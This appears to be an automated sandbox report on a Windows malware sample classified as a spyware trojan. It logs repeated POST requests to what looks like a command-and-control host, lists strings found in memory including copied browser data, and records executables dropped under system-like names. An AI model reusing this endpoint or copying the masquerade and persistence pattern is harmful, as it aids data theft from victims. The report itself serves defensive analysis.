                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 500154cm.n9shteam.in
                              Source: unknownHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: powershell.exe, 0000001B.00000002.1897890945.00000297C7390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                              Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                              Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                              Source: qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                              Source: qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                              Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                              Source: svchost.exe, 00000034.00000003.1866084978.00000257292C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                              Source: svchost.exe, 00000034.00000003.1866084978.00000257292FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                              Source: qmgr.db.52.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                              Source: powershell.exe, 00000016.00000002.3045203135.000001B890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3239915515.000001F66EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3090748741.000001F2B1C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3078390875.0000025A50FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 00000016.00000002.1851720872.000001B880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65EBD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C7708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A41158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: s5duotgoYD.exe, 00000000.00000002.1759280751.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1851720872.000001B880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65E9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C74E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A40F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000016.00000002.1851720872.000001B880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65EBD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C7708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A41158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: RuntimeBroker.exe, 00000029.00000002.2602749504.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: powershell.exe, 00000016.00000002.1851720872.000001B880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1923272794.000001F65E9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1864937137.000001F2A1BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1911427610.00000297C74E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1894522833.0000025A40F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1866487790.00000234D2C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                              Source: svchost.exe, 00000034.00000003.1866084978.00000257293CA000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                              Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                              Source: svchost.exe, 00000034.00000003.1866084978.0000025729353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1866084978.0000025729398000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1866084978.00000257293B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                              Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                              Source: powershell.exe, 0000001E.00000002.1866487790.00000234D2E89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: powershell.exe, 00000016.00000002.3045203135.000001B890078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3239915515.000001F66EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3090748741.000001F2B1C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3078390875.0000025A50FA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3141047160.00000234E2CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: svchost.exe, 00000034.00000003.1866084978.0000025729372000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                              Source: svchost.exe, 00000034.00000003.1866084978.0000025729306000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: gbwNxijWjo.49.dr, bbxeI3ug9M.49.dr, hubwaq2wy1.49.dr, nhUVWLiLPL.49.dr, 6AXfZkxDXl.49.dr, KLkhMHbGp2.49.dr, TFBbevwxIk.49.dr, YExdYK4pNu.49.dr, Wo4oAorrdG.49.dr, gDJJVxfQjK.49.dr, HKnRc8XHjH.49.dr, E9KeadD3yn.49.dr, rrqafllUeS.49.dr, 0BresBxHuN.49.dr, 5VMx1UwrKG.49.dr, qHbgtTAXCA.49.dr, dPqhjTyRx1.49.dr, igsPGqoyPx.49.dr, tjtCnMU4xK.49.dr, OtHSxTXITh.49.dr, lTLd0ET4Bv.49.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Recovery\RuntimeBroker.exeWindow created: window name: CLIPBRDWNDCLASS
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\twain_32\xKVBpkhCEjg.exeJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\twain_32\xKVBpkhCEjg.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\twain_32\04bb35a44deda9Jump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\ModemLogs\conhost.exeJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\ModemLogs\conhost.exe\:Zone.Identifier:$DATAJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Windows\ModemLogs\088424020bedd6Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMPJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMPJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeCode function: 0_2_00007FFD9BBEB84C0_2_00007FFD9BBEB84C
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeCode function: 0_2_00007FFD9BBEDB1D0_2_00007FFD9BBEDB1D
                              Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B7D0D7850_2_00007FFD9B7D0D78
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeCode function: 55_2_00007FFD9B7F0D7855_2_00007FFD9B7F0D78
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CjKcCUFn.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              Source: s5duotgoYD.exe, 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
                              Source: s5duotgoYD.exe, 00000000.00000002.1844244735.000000001C31C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs s5duotgoYD.exe
                              Source: s5duotgoYD.exe, 0000002B.00000002.2591651343.0000000002B71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
                              Source: s5duotgoYD.exe, 0000002C.00000002.2620769585.0000000003492000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
                              Source: s5duotgoYD.exe, 0000002C.00000002.2620769585.0000000003548000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
                              Source: s5duotgoYD.exe, 0000002C.00000002.2620769585.0000000003481000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
                              Source: s5duotgoYD.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs s5duotgoYD.exe
                              Source: s5duotgoYD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: s5duotgoYD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: backgroundTaskHost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: xKVBpkhCEjg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: conhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: xKVBpkhCEjg.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.csCryptographic APIs: 'CreateDecryptor'
                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.csCryptographic APIs: 'CreateDecryptor'
                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.csCryptographic APIs: 'CreateDecryptor'
                              Source: s5duotgoYD.exe, TZsYfkGWttIQxKOaTbt.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/304@1/2
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\Desktop\vEZKvYQi.logJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8784:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
                              Source: C:\Recovery\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-vm4EBTsnJo8jd1Wf9GAL
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile created: C:\Users\user\AppData\Local\Temp\ozb03vs1Jump to behavior
